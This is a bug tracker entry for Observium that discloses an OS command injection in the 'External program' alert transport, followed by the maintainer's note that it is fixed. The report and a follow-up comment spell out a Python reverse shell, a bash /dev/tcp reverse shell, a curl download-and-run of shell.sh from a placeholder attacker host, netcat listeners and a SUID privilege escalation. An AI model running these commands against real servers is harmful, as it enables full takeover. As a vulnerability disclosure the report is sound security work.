Uploaded image for project: 'Observium'
  1. Observium
  2. OBS-4816

[Security] OS command injection in the "External program" transport

Details

    • Bug
    • Resolution: Fixed
    • Major
    • None
    • CE-22.5
    • Security, Web Interface
    • None

    Description

      Hello! I discovered the possibility of executing any OS commands through the "External program" transport. This functionality can allow a user with privilege level 10 to completely compromise the server. The exploitation of this vulnerability was tested on Observium CE 23.9.13005.

      CVSS:3.1: 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

      Steps to reproduce the vulnerability:

      1. Create a contact with the "External program" transport. In the "External program path" field, insert the payload "curl YOUR_IP"
      2. Run the listener using netcat "sudo nc -lvnp 80"
      3. Create Alert Checkers and assign the contact created in step 1
      4. When an alert occurs, a curl request will be sent to your listener

      To execute a command, just paste it into this field; there is no need to use additional special characters, as in the screenshot above.

      The command specified in the "External program path" field will be executed from the user who is running Observium

      The insecure design of this functionality jeopardizes the security of the server, since an attacker can specify a reverse shell as a command. This will allow him to access the server with the ability to execute any OS commands.

      For example, just insert this python3 command to get a reverse shell (you also need to set a listener):

      python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("IP",PORT));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'

      Attachments

        Activity

          [OBS-4816] [Security] OS command injection in the "External program" transport
          Melizzgh Melizzgh added a comment -

          @Mike Stupalov Hello! I took the time to look at the fixes. 

          It seems to me that it is conceptually unsafe to allow the "External program" transport to allow OS commands to be executed. Because the legal functionality of most commands can be abused. Despite the changes in version r13514, the current functionality still leads to compromise of the server.
           
          Example 1 - Remote reverse shell: #
          Raise a web server with an bash script

          python3 -m http.server

          1. Place a bash script with contents in the python directory of the web server:

            bash -c "bash -i >& /dev/tcp/YOUR_IP/5555 0>&1"

          1. Set listener

            nc -lvnp 5555

          1. Using the "External program" functionality, execute two commands sequentially

            curl http://YOUR_IP:8000/shell.sh -o /tmp/shell.sh 

            bash /tmp/shell.sh

           
          Example 2 - Local privilege escalation via SUID-bit: #
          Using the "External program" functionality, execute two commands sequentially

          cp /bin/bash /tmp/shell_lpe
          		 

          chmod u+s /tmp/shell_lpe

           

          Melizzgh Melizzgh added a comment - @Mike Stupalov Hello! I took the time to look at the fixes.  It seems to me that it is conceptually unsafe to allow the "External program" transport to allow OS commands to be executed. Because the legal functionality of most commands can be abused. Despite the changes in version r13514 , the current functionality still leads to compromise of the server.   Example 1 - Remote reverse shell: # Raise a web server with an bash script python3 -m http.server Place a bash script with contents in the python directory of the web server: bash -c "bash -i >& /dev/tcp/YOUR_IP/5555 0>&1" Set listener nc -lvnp 5555 Using the "External program" functionality, execute two commands sequentially curl http: //YOUR_IP:8000/shell.sh -o /tmp/shell.sh bash /tmp/shell.sh   Example 2 - Local privilege escalation via SUID-bit: # Using the "External program" functionality, execute two commands sequentially cp /bin/bash /tmp/shell_lpe chmod u+s /tmp/shell_lpe  
          landy Mike Stupalov added a comment -

          Fixed in r13514.
          Will be fixed in next CE release.

          landy Mike Stupalov added a comment - Fixed in r13514. Will be fixed in next CE release.

          People

            landy Mike Stupalov
            Melizzgh Melizzgh
            Votes:
            0 Vote for this issue
            Watchers:
            3 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: